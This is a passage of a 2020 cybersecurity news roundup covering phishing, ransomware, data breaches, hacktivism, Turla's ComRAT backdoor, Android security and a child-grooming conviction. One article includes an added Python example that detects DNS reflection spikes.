As a result of these issues, 76% of C-suite executives had asked to bypass one or more of their organization’s security protocols last year. This included requests to: gain network access to an unsupported device (47%), bypass multi-factor authentication (45%) and obtain access to business data on an unsupported app (37%).

“These findings are concerning because all of these C-suite exemptions drastically increase the risk of a data breach,” commented Brian Foster, SVP product management, MobileIron. “Accessing business data on a personal device or app takes data outside of the protected environment, leaving critical business information exposed for malicious users to take advantage of. Meanwhile, multi-factor identification – designed to protect businesses from the leading cause of data breaches, stolen credentials – is being side-stepped by C-suite execs.” 

To exacerbate this issue, IT decision makers included in the study overwhelmingly stated that C-suite is the group most likely to both be targeted by (78%), and fall victim to (71%), phishing attacks.

Foster added: “These findings highlight a point of tension between business leaders and IT departments. IT views the C-suite as the weak link when it comes to cybersecurity, while execs often see themselves as above security protocols.”

Cyber-Criminals Impersonating Google to Target Remote Workers

Remote workers have been targeted by up to 65,000 Google-branded cyber-attacks during the first four months of 2020, according to a new report by Barracuda Networks. The study found that Google file sharing and storage websites were used in 65% of nearly 100,000 form-based attacks the security firm detected in this period.

According to the analysis, a number of Google-branded sites, such as storage.googleapis.com, docs.google.com, storage.cloud.google.com and drive.google.com, were used to try and trick victims into sharing login credentials. Google-branded attacks were far in excess of those impersonating Microsoft, with the sites onedrive.live.com, sway.office.com and forms.office.com making up 13% of attacks.

Other form-based sites used by attackers included sendgrid.net (10%), mailchimp.com (4%) and formcrafts.com (2%).

Overall, the use of the Google brand by cyber-criminals to trick users appears to be increasing: Barracuda Networks observed Google-brand impersonation attacks represented 4% of all spear-phishing attacks during the first four months of 2020. This figure is expected to rise, as it has proved to be successful in the harvesting of credentials.

Steve Peake, UK systems engineer manager, Barracuda Networks, outlined: “Brand-impersonation spear-phishing attacks have always been a popular and successful method of harvesting a user’s login credentials, and with more people than ever working from home, it’s no surprise that cyber-criminals are taking the opportunity to flood people’s inboxes with these scams. The sophistication of these attacks has accelerated in recent times: now, hackers can even create an online phishing form or page using the guise of legitimate services, such as forms.office.com, to trick unsuspecting users.”

There has been a substantial rise in phishing attacks recently as a result of the increase in people working from home during the COVID-19 pandemic, with security systems and practices difficult to maintain for many businesses in these circumstances.

Barracuda Networks added that security methods such as multi-factor identification and email security software are especially vital for organizations at this time.

Check Point Unmasks Hacktivist Who Defaced Nearly 5000 Sites

Security researchers are claiming victory after unmasking an infamous hacktivist who defaced nearly 5000 websites in more than 40 countries over the past few years.

The individual, known online as “VandaTheGod” on Twitter, took to social media to publicize his exploits, sometimes under aliases such as “Vanda de Assis” and “SH1N1NG4M3,” according to Check Point.

This activity first alerted the security firm to his presence, and also provided a trail of clues which ultimately led them to his real identity: an individual living in the south-eastern Brazilian municipality of Uberlandia.

Active since 2013, the hacktivist never reached his stated personal goal of compromising over 5000 websites. However, thousands of government, academic and corporate sites were apparently defaced with anti-government and social justice messages thanks to his work.

In the last year, over half (57%) were located in the US — where victims included the official website of the state of Rhode Island and the city of Philadelphia — while Australia and the Netherlands rounded out the top three targeted countries.

VandaTheGod was also active in his home country, defacing a Brazilian government website with the hashtag #PrayforAmazonia, in response to the increase in rainforest clearing approved by right-wing President Bolsonaro.

However, his motives weren’t always so altruistic, and occasionally strayed into theft of credit card details and log-ins. VandaTheGod is said to have attempted to breach details from public figures, universities and even hospitals — on one occasion offering to sell the medical records of one million New Zealand patients for $200 per record.

“This case highlights the level of disruption that a single, determined individual can cause internationally. Although ‘VandaTheGod’s’ motive originally seemed to be protesting against perceived injustices, the line between hacktivism and cybercrime is thin,” argued Check Point manager of threat intelligence, Lotem Finkelsteen. 

“We often see hackers taking a similar path from digital vandalism to credentials and money theft as they develop their techniques. Revealing the person’s true identity and disclosing it to law enforcement should put an end to their extensive disruptive and criminal activities.”

Ransomware Demands Soared 950% in 2019

Ransomware operators had another standout year in 2019, with attacks and ransom demands soaring according to new data from Group-IB.

The Singapore-based security vendor claimed that, after a relatively quiet 2018, ransomware was back with a vengeance last year, as attack volumes climbed by 40%.

As large enterprises became an increasing focus for attacks, ransom demands also soared: from $8,000 in 2018 to $84,000 last year. That’s a 950% increase.

The “greediest ransomware families with highest pay-off” were apparently Ryuk, DoppelPaymer and REvil, the latter on occasion demanding $800,000.

As mentioned, last year saw an increasing number of attackers focus their efforts on larger targets, often using sophisticated APT-style tactics, according to Group-IB. This included trojans such as Dridex, Emotet, SDBBot, and Trickbot to compromise victims and post-exploitation frameworks such as Cobalt Strike, CrackMapExec, PowerShell Empire, PoshC2, Metasploit, and Koadic to gather info on the targeted network. Data theft also became a popular way to force payment.

Phishing emails continued to be the number one initial threat vector, alongside RDP compromise and websites infected with exploit kits, the security vendor added.

“The year of 2019 was marked by ransomware operators enhancing their positions, shifting to larger targets and increasing their revenues, and we have good reason to believe that this year they will celebrate with even greater achievements,” said Group-IB senior digital forensics specialist, Oleg Skulkin.

“Ransomware operators are likely to continue expanding their victim pool, focusing on key industries, which have enough resources to satisfy their appetites. The time has come for each company to decide whether to invest money in boosting their cybersecurity to make their networks inaccessible to threat actors or risk being approached with ransom demand and go down for their security flaws.”

Ransomware operators have indeed picked up where they left off at the end of 2019, launching a blizzard of attacks against firms struggling to adapt to mass remote working, as well as hospitals fighting COVID-19.

According to Coveware, the average ransom paid in the first three months of the year surged by 33% quarter-on-quarter. However, contrary to Group-IB’s analysis, it claimed that despite the “big game hunting” narrative, most victims are likely to be SMBs.

The average number of employees in ransomware victims was 625 in Q1, with the median a much smaller 62.

#COVID19 Drives Dealers Online as Drugs Supply Soars

The supply of dark web drugs soared nearly 500% over the first few months of this year as dealers took to the internet to continue trading, according to new data from Sixgill.

The cyber-intelligence company monitors multiple underground sites and forums for its customers.

It reported that although the supply of malware, phishing kits, and stolen accounts has been pretty steady over the past 12 months, that of illegal drugs has spiked recently as government lockdowns forced individuals off the streets.

The firm claimed that the number of items for sale in December 2019 stood at 4,154, but this had risen to 24,719 by April 2020 — an increase of 495%.

MDMA postings apparently grew 224%, cannabis postings were up 555%, and cocaine posts spiked 1000% over the period.

“Feedback, while an imperfect metric for purchase volume, is a reliable indicator of the rate of transactions,” Sixgill explained. “Feedback volume for cannabis, cocaine, and MDMA all nearly doubled over the past half year.”

However, despite this surge in online supply and a likely uptick in sales, the underground market was not immune to the same dynamics as legitimate economic sectors.

“As with all online shopping, shipping delays occurred, with dark web chatter suggesting that slower delivery times dinged the reputations of vendors among a cynical customer base that’s always vigilant for scammers. Though the rise in chatter and concerns was temporary, it did make both vendors and consumers more conscious of the risks of international shipping for illegal goods,” the security firm explained.

“While supply surged, demand lagged and never caught up, rising later and at a slower pace. That led to a 10-fold surge in mentions of ‘bargains’ and ‘discounts’ in early 2020. That’s not only a response to oversupply, but a reaction to consumers’ precarious economic situation during the economic freeze.”

New York Teen Masterminds $23.8m Crypto Heist

An American cryptocurrency investor is suing a New York high school senior over the theft of $23.8m in digital currencies.

Michael Terpin has filed a civil complaint against 18-year-old Ellis Pinsky alleging that in 2018, at the tender age of 15, Pinsky masterminded a plot to defraud Terpin out of millions.

Pinsky was allegedly the leader of what Terpin described as a "gang of digital bandits" who stole from multiple victims after using SIM swapping to gain control of their smartphones.

None of the teen's alleged co-conspirators were named in the complaint, in which Terpin accuses them and Pinsky of racketeering and computer fraud. 

Terpin claims that, after hijacking the native wallet on his BlackBerry, Pinsky cockily bragged to his peers that he would get away with his cybercrime. 

“On the surface, Pinsky is an ‘All American Boy,’” Terpin said in a complaint filed May 7 in a federal court in White Plains, New York. “The tables are now turned.”

In May last year, Terpin won a $75.8m civil judgement in a California state court in a related case against an alleged associate of Pinsky, Nicholas Truglia, who has faced criminal hacking charges. Now Terpin is gunning for Pinsky, seeking triple damages of $71.4m.

According to Reuters, court records show that Terpin is also suing his carrier AT&T Mobility in Los Angeles for $240m. 

To his classmates at Irvington High School, Pinsky was an unremarkable individual who achieved decent grades and liked playing soccer. 

At the time of the alleged crypto-heist, Pinsky was living in a $1.3m home he shared with his family. An anonymous insider told the New York Post that Pinsky explained his newfound wealth to his parents by saying that he had gotten lucky making Bitcoin online through video games.  

The teen allegedly used the stolen money to travel by private jet, purchase an Audi R8, and splash out on the latest sneakers. 

Pinsky's attorney, Noam Biale, told the New York Post: “Ellis was a child at the time of the alleged conduct. . . . It is deeply unfortunate that Mr. Terpin has chosen to bring [a] lawsuit, full of smears and baseless allegations, for no imaginable purpose other than spite.”

Data Breach at Bank of America

Bank of America Corporation has disclosed a data breach affecting clients who have applied for the Paycheck Protection Program (PPP). 

Client information was exposed on April 22 when the bank uploaded PPP applicants' details onto the US Small Business Administration's test platform. The platform was designed to give lenders the opportunity to test the PPP submissions before the second round of applications kicked off.

The breach was revealed in a filing made by Bank of America with the California Attorney General's Office. As a result of the incident, other SBA-authorized lenders and their vendors were able to view clients' information. 

Data exposed in the breach consisted of details relating not only to individual businesses, but also to their owners. Compromised data may have included the business address and tax identification number along with the owner's name, address, Social Security number, phone number, email address, and citizenship status.

Bank of America, which is headquartered in Charlotte, North Carolina, said that access to the information was limited. 

In a breach notification document, a spokesperson for the bank said: "There is no indication that your information was viewed or misused by these lenders or their vendors. And your information was not visible to other business clients applying for loans, or to the public, at any time."

The bank neglected to share any specifics of which applicants were affected by the breach, stating only that it was a "small number" of clients. The exposed data was drawn from a pool of nationwide applications, meaning that businesses in multiple states may have been impacted.

More than 305,000 PPP relief applications have been processed by Bank of America with the SBA.

Upon discovering the breach, the bank asked the Small Business Administration to remove the visible information. According to the filing, the SBA resecured the exposed data within one day of its being accidentally exhibited. 

The bank said that the PPP application and submission processes were not affected by the cybersecurity mishap. An internal investigation has been launched to determine how the data came to be exposed. 

Bank of America is offering clients affected by the breach free two-year membership of Experian's identity theft protection program.

Thais Ditch Twitter for Blockchain-Based Social Network Minds

Thais are deserting Twitter in favor of the blockchain-based social networking tool Minds.

Minds is a free and open source distributed social networking service that gives users ERC20 tokens that can be used to promote content or crowdfund other users. Tokens are awarded based on the time a user spends accessing the service and the number of interactions that they have.

The platform was founded in 2011 and is headquartered in Wilton, Connecticut. Unlike some social media platforms that are moving toward increased censorship, Minds describes its content policy as "based on the First Amendment and governed by a community jury in order to minimize bias and censorship."

Minds founder Bill Ottman told Coconuts Bangkok that the platform saw a spike of 100,000 new Thai users in a single day last week, causing the service to crash temporarily. According to Minds, there are now more than 200,000 Minds users in Thailand.

Ottman said: “We are thrilled to provide privacy, internet freedom and digital rights for Thai netizens. This is exactly the reason Minds exists.”

Among the Thai Twitter users to defect to Minds was prominent writer and social critic Sarinee Achavanuntakul. Her final tweet, posted on May 21, read, “Say goodbye to Twitter and meet at Minds.”

Twitter became popular in Thailand as a way for citizens to speak their minds anonymously in a country where speech is harshly restricted and the lese-majeste law forbids the insulting of the monarchy. 

Journalists who criticize Thailand's military rule are detained by the government and subjected to what the Committee to Protect Journalists describes as "attitude adjustment sessions."

According to Quartz, Thais have "grown wary and distrustful of Twitter over a recent string of developments on the platform that sparked privacy concerns."

One such development was an update to Twitter's privacy policy on May 19, giving the platform permission to share device-level data like a user's IP address with its business partners. 

The update came days after Twitter announced in a blog post that the company had launched an official Twitter Thailand account and partnered with the Thai government and local NGOs.

Achavanuntakul said in recent months, young users "who have been critical of the monarchy” on Twitter have received visits from the police at home.

UK Energy Operators Join the European Network for Cybersecurity

The National Grid Gas Transmission (NGGT) and National Grid Electricity Transmission (NGET) in the UK have become the newest members of the European Network for Cybersecurity (ENCS), in a move designed to better protect the European energy sector against cyber-attacks. The NGGT and NGET will now engage in information sharing regarding cyber-threats with a number of major utility organizations across Europe. 

The ENCS already works on cybersecurity in electricity and gas across Europe, both at the distribution and transmission levels. In addition to sharing expertise, energy organizations that are part of the group collaborate on capacity building, conduct training and provide security testing and standards for a range of components such as smart meters.

The NGGT and NGET are both part of National Grid plc, which is one of the world’s largest investor-owned energy utilities, and works to deliver electricity and gas safely and efficiently to customers in the UK.

Anjos Nijk, managing director of the ENCS, commented: “The National Grid already ranks among the most sophisticated transport system operators (TSOs) in terms of cybersecurity, and by joining the ENCS, it demonstrates its commitment to that improving even further – and of course, brings a wealth of experience to the table that our members will benefit from.

“The energy sector is only becoming more interconnected, and it is vital those of us looking to protect it do the same.”

The NGGT and NGET become the first UK-based organizations to join the ENCS.

Paul Lee, engineering manager for cyber and control systems at National Grid, added: “We have robust cybersecurity measures in place across all our operational infrastructure and IT to protect against cyber-threats, but our membership will help us to benefit from the ENCS knowledge base as we share information with other members, contributing to increased protection across all critical infrastructure.”

The energy sector has been a frequent target of cyber-criminals. Last month, it was claimed that energy firm EDP was hit with a €10m ransomware threat.

Nearly One Fifth of Law Firms Show Signs of Compromise

Cybersecurity experts are calling for the legal sector to be defined as critical to securing national infrastructure, after revealing that 100% of law firms were targeted by attackers in the first quarter of 2020.

BlueVoyant appraised thousands of law firms worldwide between January and March 2020, to compile its latest report, Sector 17 – The State of Cybersecurity in the Legal Sector.

Of those targeted, some 15% are likely to have been compromised while nearly half showed signs of suspicious activity, including malicious proxy use, it said.

The near-$1 trillion sector is a prime target for financially motivated attacks as well as nation state actors looking for sensitive information they can use to make money or leverage geopolitically.

The report details examples of ransomware threats, financial data and PII theft, third-party risks, password breaches, insider leaks and hacktivism.

These include stand-out cases such as the 2016 Panama Papers breach of law firm Mossack Fonseca, the 2017 ‘ransomware’ outage at DLA Piper caused by NotPetya, and this year’s Luanda Leaks breach which revealed incriminating evidence on the former President of Angola.

BlueVoyant, a firm which counts former GCHQ director Robert Hannigan as its chairman, wants the sector to be added to the 16 others defined by the Department of Homeland Security as critical to securing national infrastructure, resources and resiliency.

“The stakes could not be higher. While the legal sector is performing well in comparison to the other 16 sectors, attacks against law firms constitute some of the most sensational and damaging cyber-attacks in history. We have already seen how recent incidents can cause substantial geopolitical fallout, not to mention tremendous direct and indirect financial repercussions for law firms,” argued CEO Jim Rosenthal.

“Threat actors are aggressively targeting law firms, and they are doing so daily. Threats against law firms are high volume, multi-faceted, and organized; threat actors use multiple sophisticated tools and techniques; and, notwithstanding industry-leading efforts, law firms have been successfully compromised.”

DNS Traffic Analysis Detects Hidden DDoS Attacks

New research has found a measurable increase in DNS cache miss traffic levels, and a number of previously unknown DDoS events.

According to Farsight Security, analysis of DNS cache miss traffic levels over the two-month period of March-April 2020 revealed “a macroscopic phenomenon.” The analysis was done over 300 domains for leading travel and transportation, retail, streaming video, higher education and news and partisan opinion sites.

Using its DNSDB intelligence solution, Farsight said that it looked at daily DNS transactions for over 300 sites, examining the DNS cache miss traffic for all hostnames under a given delegation point. This revealed some websites experiencing spikes in volume, which Farsight stated represent reflective distributed denial of service (DDoS) attack traffic: the studied sites' nameservers were being abused to bounce responses at unrelated third-party targets.

It said at least two distinct reflective DDoS attack patterns took place among the studied sites: one pattern type which appeared to be purely associated with abusive DNS SOA (Start of Authority) queries, and a second pattern type which melds abusive DNS SOA queries with abusive DNS TXT queries for wildcarded SPF redirect records.

Also some sites experienced spikes in volume that were so large that the spikes caused most of the “normal variation” in traffic volume to “wash out” due to the dominance of the spike or spikes.

Dr. Paul Vixie, chairman, CEO and co-founder of Farsight Security, said whilst headlines focused on a virus pandemic, most of the DNS traffic related to those headlines will be due to fraudulent or criminal activity by those hoping to cash in on the public's attention. “Therefore, it is worth our time to study DNS traffic patterns during every global event, to characterize current abuses of the system and to predict future abuses,” he said.

Farsight also discovered a step up pattern in traffic, typically reflecting a four-to-seven-times increase in DNS cache miss traffic levels, across most or all verticals during the same period.

To reduce the risk of DDoS events, Farsight recommended that nameserver vendors ship their products with Response Rate Limiting (RRL) enabled by default. Farsight also recommended all authoritative name server operators confirm that their current configurations have RRL enabled. 
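The two spike patterns and the step-up described above can be checked for mechanically against daily cache-miss counts. The following is an added example, not Farsight's code and not DNSDB output: the log format (one `<date> <qtype> <count>` line per day per query type for a single delegation point) and the thresholds are assumptions chosen for illustration, and the twelve days of counts are constructed inline.

```python
"""Spike and step-up detection over daily DNS cache-miss counts (added example).

Not Farsight's code and not DNSDB output. Input lines are assumed to be
"<date> <qtype> <cache_miss_count>" for one delegation point, one line per
day per query type; thresholds are illustrative.
"""
from collections import defaultdict
from statistics import median

SPIKE_FACTOR = 10     # a day is a spike at >= 10x the qtype's median
STEP_UP_FACTOR = 4    # the article reports sustained 4-7x rises


def build_sample_log():
    """Constructed 12-day series (not real data): flat baseline, a SOA-only
    spike on 03-05, a SOA+TXT spike on 03-08, and A-record traffic stepping
    up 5x from 03-07 onward."""
    lines = []
    for day in range(1, 13):
        date = f"2020-03-{day:02d}"
        a = 1000 if day <= 6 else 5000
        soa = {5: 9000, 8: 7000}.get(day, 10)
        txt = 5000 if day == 8 else 20
        lines += [f"{date} A {a}", f"{date} SOA {soa}", f"{date} TXT {txt}"]
    return "\n".join(lines)


def parse_log(text):
    """Parse log lines into {qtype: [(date, count), ...]}, sorted by date."""
    series = defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        date, qtype, count = line.split()
        series[qtype.upper()].append((date, int(count)))
    return {q: sorted(p) for q, p in series.items()}


def spike_days(points, factor=SPIKE_FACTOR):
    """Dates whose count is at least `factor` times the series median.
    The median, not the mean, is the baseline so the spikes themselves
    cannot wash out the normal level they are measured against."""
    if not points:
        return set()
    base = median(c for _, c in points)
    return {d for d, c in points if base > 0 and c >= factor * base}


def classify_spikes(series):
    """Label spike days as the two reflection patterns in the text:
    SOA-only, or SOA melded with TXT (wildcard SPF redirect lookups)."""
    soa = spike_days(series.get("SOA", []))
    txt = spike_days(series.get("TXT", []))
    labels = {}
    for day in sorted(soa | txt):
        if day in soa and day in txt:
            labels[day] = "SOA+TXT reflection"
        elif day in soa:
            labels[day] = "SOA-only reflection"
        else:
            labels[day] = "TXT spike without SOA component"
    return labels


def step_up(points, factor=STEP_UP_FACTOR):
    """True when the second half of the window sits at >= `factor` times
    the first half, with spike days removed first so one reflection event
    cannot masquerade as a sustained rise."""
    spikes = spike_days(points)
    clean = [c for d, c in points if d not in spikes]
    if len(clean) < 4:
        return False
    half = len(clean) // 2
    first, second = median(clean[:half]), median(clean[half:])
    return first > 0 and second >= factor * first


def analyse(text):
    """Run both detectors over one delegation point's log."""
    series = parse_log(text)
    return {
        "spikes": classify_spikes(series),
        "step_up": {q: step_up(p) for q, p in series.items()},
    }


if __name__ == "__main__":
    for key, value in analyse(build_sample_log()).items():
        print(key, value)
```

Excluding already-flagged spike days before testing for a step-up matters: a single large reflection event would otherwise pull the second-half median up and read as a sustained rise. A flagged day is a prompt to look at who the responses were being sent to, not proof on its own; RRL on the authoritative servers, as recommended above, is the mitigation that limits how useful the zone is as a reflector.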

Trump Election Tweet Labelled Fake News

Donald Trump has decided to pick a fight with Twitter after one of his posts on the upcoming election was labelled misleading by the social media platform.

The original tweet claimed that Mail-In (postal) ballots during the November Presidential election would be “substantially fraudulent.”

The issue has become a partisan one of late, as Democrats push for voters to have the option of mailing in their votes to avoid the risk of COVID-19 infection at the polling booth. They claim that otherwise, millions of voters may be disenfranchised as they stay at home.

Many Republicans, including Trump, believe higher voter turnouts enabled by postal voting would give their opponents an advantage, as groups that would otherwise stay home are more likely to vote Democrat.

Twitter labelled Trump’s tweet with a clickable blue notification stating "get the facts about mail-in ballots," which takes users to a page debunking the false assertion that postal votes lead to election fraud.

Unsurprisingly, Trump hit back, branding Twitter’s response as stifling free speech and interfering in the 2020 election.

In fact, many commentators have argued that Twitter has been too easy on Trump in recent months and years, saying that his status and 80 million followers have given him carte blanche to say things that others would be blacklisted for.

Twitter’s decision can be seen in the context of its newly updated policy on misleading information. Because the propensity for harm was judged “moderate” in this case, the platform merely labelled Trump’s tweet, but if that rating is upped to “severe” then future posts could be removed.

Either way, the incident is likely to be just the first of many ahead of the election as Trump seeks to fire up his base with increasingly outlandish statements on social media.

UK Public Backlash Could Scupper #COVID19 App

The UK’s plans to ease its COVID-19 lockdown have been thrown into doubt after half the public said it does not trust the government to handle their data collected via a key contact tracing app.

The app is a crucial part of the best practice “test, track and trace” strategy being rolled out around the world to help businesses and society get back to normal after weeks of social distancing.

“The NHS COVID-19 app automates the process of contact tracing,” noted the NHS. “Its goal is to reduce the transmission of the virus by alerting people who may have been exposed to the infection so they can take action to protect themselves, the people they care about and the NHS.”

It’s currently being trialled on the Isle of Wight ahead of a slated June 1 launch nationwide.

However, in a new survey of 1000 UK adults, Anomali found that 48% do not trust the government to keep the data collected by the app safe. A further 43% said they were concerned it would give hackers an opportunity to send phishing emails and texts — something only 52% said they felt savvy enough to be able to spot.

“It’s tough to predict the increase in the volume of attacks we’ll see. However, we’re already seeing thousands of rogue and spoof COVID-19 domains being registered and used in attacks,” Anomali head of EMEA, Jamie Stone, explained.

“Global interest around the virus, and each nation’s track-and-trace apps, means that attackers will likely use many of these domains to host phishing attacks via both email and SMS. People using COVID tracking apps need to be extremely vigilant and aware, ensuring that they’ve installed official government apps and that they are interacting with authentic messages from the agencies.”

Respondents also raised concerns about government surveillance: a third (33%) claimed the app may be able to track their whereabouts and 36% said that it may allow the government to collect data on them.

Unlike many being developed across Europe and elsewhere, the NHS app is said not to rely on the API developed by Apple and Google, which keeps the collected data on the user’s device.

Instead, it is centralized, although the NHS claimed that no personally identifiable data is collected, the app will conform to UK law, and that data “will only ever be used for NHS care, management, evaluation and research.”

For voluntary contact tracing apps like this one to make a meaningful contribution to “test, track and trace” they need to be downloaded and used by 80%+ of current smartphone users. That makes confidence in the government’s approach crucial.

Yet there is widespread suspicion of government surveillance and data misuse in the UK thanks to incidents like the Windrush scandal and 2016 legislation known as the Investigatory Powers Act, aka the Snooper’s Charter.

This has been compounded by recent events, in which the Prime Minister’s chief advisor, Dominic Cummings, was found to have driven over 250 miles during lockdown, breaking the guidelines he helped to draw up.

Deputy Sheriff Admits Cyberstalking Massachusetts Tween

A former deputy sheriff has pleaded guilty to cyberstalking and sexually exploiting a teenage girl whom he met through playing Minecraft online. 

When 26-year-old Texan Pasquale T. Salas first encountered his victim in 2014, she was just 12 years old. 

Salas engineered a relationship with the child by sending her messages in private chat rooms. The former deputy sheriff with the Matagorda County Sheriff’s Office then systematically used Skype, Snapchat, and text messages to groom the little girl.

Authorities said that during their digital exchanges, Salas put repeated pressure on his tweenage victim to capture sexually explicit images of herself and send them to him. 

At his coercion, the victim sent hundreds of lewd videos and images of herself to Salas over a two-year period. Some of the images were sent as they communicated via Minecraft. 

In a sick attempt to make the exploitation appear like a genuine relationship, Salas sent his victim jewelry, Edible Arrangements, and iTunes gift cards and granted her access to his Amazon Prime account.

The exploited girl, who is from Worcester County, tried to break off contact with Salas in 2016. The self-confessed sexual predator responded by repeatedly threatening to send lewd images of the victim to her family and friends unless she kept communicating with him.

Salas used technology to control his victim. He manipulated her into granting him access to her Snapchat, then used a tracking option on the app to keep tabs on the girl's whereabouts. 

The girl was ordered to obey a list of rules written by Salas that dictated what she could wear and whom she could speak with. 

According to authorities, Salas threatened to harm the girl's sister if she disobeyed him. He also meted out punishments to his victim when she went against his wishes.

Salas told the girl, “You belong to me. You’re my property so I can treat you however I want, whenever I want.”

Authorities said a second female victim had been sexually exploited by Salas for four years. Victim number 2 was also aged 12 when she met Salas via Minecraft. 

Salas, who is in custody at the Donald W. Wyatt Detention Facility in Rhode Island, will be sentenced on September 3.

International Plea for Governments to Protect Healthcare from Cyber-Attacks

A plea from the Cyber Peace Institute for healthcare providers to be protected against cyber-threats has attracted international support.

Major players in cybersecurity, academics, and numerous political movers and shakers have backed the call for governments to work together "with civil society and the private sector" to defend hospital, healthcare, and medical research facilities from digital assaults. 

In a strongly worded plea published May 26, the Cyber Peace Institute asked governments to assert in unequivocal terms that the targeting of healthcare facilities by cyber-criminals is both "unlawful and unacceptable."

"We call on the world’s governments to take immediate and decisive action to stop all cyberattacks on hospitals, healthcare and medical research facilities, as well as on medical personnel and international public health organizations," wrote the CPI. "To this end, governments should work together, including at the United Nations, to reaffirm and recommit to international rules that prohibit such actions."

The CPI highlighted recent cyber-assaults against healthcare providers around the world, cynically timed to coincide with the outbreak of COVID-19 in nearly every corner of the planet. 

"Over the past weeks, we have witnessed attacks that have targeted medical facilities and organizations on the frontlines of the response to the COVID-19 pandemic," wrote CPI. 

"These actions have endangered human lives by impairing the ability of these critical institutions to function, slowing down the distribution of essential supplies and information, and disrupting the delivery of care to patients." 

While the rate of deaths caused by the novel coronavirus continues to fall in some countries, bringing hope that the pandemic is ebbing, the CPI's plea warns against complacency.

"With hundreds of thousands of people already perished and millions infected around the world, medical care is more important than ever," wrote the CPI. "This will not be the last health crisis."

Political bigwigs who have signed the Institute's rally call include former presidents of the Soviet Union, Uruguay, Brazil, Liberia, Chile, Swiss Confederation, Mexico, Colombia, Denmark, Poland, and Slovenia, as well as former US secretary of state Madeleine Albright.

Signatories from the cybersecurity industry include Kaspersky CEO Eugene Kaspersky, Microsoft president Brad Smith, and Trend Micro CEO Eva Chen.

National Guard Helps Maryland with Cybersecurity

The National Guard has been working to keep Maryland safe from cyber-attacks.

Maryland governor Larry Hogan called in the National Guard by executive order on March 12 to bolster the state's COVID-19 pandemic response. In addition to assisting the Old Line State with its coronavirus testing and screening program, the Guard has been helping out with cybersecurity assessments.

Baltimore, Maryland's largest city, was rocked by a catastrophic ransomware attack last year that prevented government officials from performing even basic tasks like sending an email. 

In an interview with Federal Computer Week, Colonel Reid Novotny, Maryland National Guard's joint staff (J6) lead for IT and cyber, said that surviving a major attack did not make Baltimore invulnerable to cyber-criminals. 

"During this crisis, we are in daily contact with them [in] an elevated status," said Novotny. “There have been ransomware attacks that have affected hospitals that are treating COVID patients."

Novotny wouldn't specify which hospitals had been targeted but said that attacks had been observed in Baltimore and Baltimore County.

"Yes, that stuff has actually happened, and the department of IT has responded back, and the Guard has supported that response," he said.

"Patients and the residents of that county that went to that hospital were assured that everyone was up and working."

The state's chief information security officer, Chip Stewart, said that malicious activity against Maryland had increased since the outbreak of COVID-19. 

"Maryland has noticed an increased frequency of attempted cyber-attacks as have many other states throughout the country, ranging from phishing emails to sophisticated attempts to bypass security measures," said Stewart.

To counter the threats, Maryland has established a security operations center to monitor attacks on its digital infrastructure.

According to Stewart, the National Guard is supporting the state's efforts to thwart cyber-attackers by performing "routine external assessments of the state's websites and networks to identify issues proactively."

As of May 15, the Maryland National Guard has supplied over 3,000 hours of support to four different state agencies across four of Maryland's counties. Novotny said the commercial value of the Guard's cyber-support was roughly $1m.

New Version of Turla Malware Poses Threat to Governments

Details of a new version of the ComRAT backdoor, one of the oldest malware families run by the notorious cyber-espionage group Turla, have been outlined by ESET. The findings will be of particular concern for government agencies, such as militaries and diplomats, with this updated backdoor able to use Gmail web UI to receive commands and exfiltrate data to try and steal confidential documents.

The Turla group, also referred to as ‘Snake,’ has been operating for at least 10 years, primarily targeting governments across Europe, Central Asia and the Middle East. It has breached a number of major organizations including the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014.

One method it uses to steal important information is the ComRAT backdoor, which is believed to have been first released in 2007. “Based on the victimology and the other malware samples found on the same compromised machines, we believe that ComRAT is used exclusively by Turla,” noted Matthieu Faou, malware researcher at ESET.

ESET has found evidence the fourth version of the malware, which has attacked at least three government institutions since 2017, was still active in January 2020. The operators used public cloud services such as OneDrive and 4shared to exfiltrate data.

The new version uses a completely new code base and is far more complex than earlier incarnations. It can perform a number of new actions on compromised computers, such as executing additional programs and exfiltrating files, whilst having unique abilities to evade security software.

“This shows the level of sophistication of this group and its intention to stay on the same machines for a long time,” explained Faou. “Additionally, the latest version of the ComRAT malware family, thanks to its use of the Gmail web interface, is able to bypass some security controls because it doesn’t rely on any malicious domain.”

Customized Android Builds Drive Global Security Inequality

Security experts have warned that default regional settings and pre-loaded applications may be exposing Android devices in some countries to a greater risk of cyber-attack.

F-Secure claimed today that large numbers of pre-bundled apps can expand the attack surface of a device.

The impact is potentially worse when country-specific rules block access to Google Play, meaning that users have to rely on third-party stores curated by the phone manufacturers themselves.

F-Secure claimed it found multiple vulnerabilities in the Huawei AppGallery which could be used to “create a beachhead” to launch additional attacks, such as one targeting the Huawei iReader which could allow hackers to execute code and steal data from devices.

Meanwhile, a simple phishing email/message could be enough to compromise the default configuration on the Xiaomi Mi 9 for China, India, Russia and maybe other countries, the security vendor claimed.

In another case, the research team compromised a Samsung Galaxy S9 by exploiting the fact that the device changes its behavior according to which country issued the SIM inside it.

“To perform this attack, an adversary must manipulate an affected Galaxy S9 user into connecting to a Wi-Fi network under their control (such as by masquerading as free public Wi-Fi),” F-Secure explained.

“If the phone detects a Chinese SIM, the affected component accepts unencrypted updates, allowing an adversary to compromise the device with a man-in-the-middle attack. If successful, the attacker will have full control of the phone.”

F-Secure warned that as the number of customized Android builds grows, the white hat community needs to double down on research.

“It’s important for vendors to consider the security implications when they’re customizing Android for different regions,” added senior security consultant, Toby Drew.

“People in one region aren’t more or less entitled to security than another, and if you have the same device configured to provide a less secure experience to users in one region compared to another, it’s creating a type of inequality by increasing their exposure to attacks.”

Data on 29 Million Indian Jobseekers Leaked

The personal details of over 29 million Indian jobseekers have been posted to a dark web site, free for anyone to access.

Cybersecurity firm Cyble, which discovered the trove on an unnamed hacking forum, has in turn added the compromised information to its breach notification site AmIBreached.

It claimed to have found the posting during a regular sweep of the dark and deep web. The 2.3GB file includes email, phone, home address, qualification, work experience, current salary, employer and other details on job-hunters from all over India.

“Cyber-criminals are always on the lookout for such personal information to conduct various nefarious activities such as identity thefts, scams and corporate espionage,” said Cyble.

The vendor claimed that the leak had originated from a CV aggregation service which collected the data from legitimate job portal sites. An update over the weekend clarified that the data may have been initially exposed by an unprotected Elasticsearch instance, subsequently made inaccessible.

It continues to investigate these claims.

In the meantime, it spotted another threat actor posting nearly 2000 Aadhaar identity cards for free on a hacking forum. They appear to originate from Madhya Pradesh state.

Also over the weekend, Cyble claimed that three hacking forums have themselves been breached, exposing user details and private chats.

